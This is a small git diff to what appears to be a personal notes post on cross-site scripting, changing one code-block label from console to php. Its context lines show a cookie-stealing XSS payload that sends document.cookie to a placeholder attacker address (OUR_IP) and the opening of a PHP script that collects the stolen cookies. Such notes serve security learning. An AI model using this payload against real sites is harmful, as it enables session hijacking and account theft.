--- a/_posts/notes/vulnerabilities/2021-12-12-xss.md
+++ b/_posts/notes/vulnerabilities/2021-12-12-xss.md
@@ -224,7 +224,7 @@ new Image().src='http://OUR_IP/index.php?c='+document.cookie
 ```
 
 With the following **index.php**:
-```console
+```php
 <?php
 if (isset($_GET['c'])) {
     $list = explode(";", $_GET['c']);
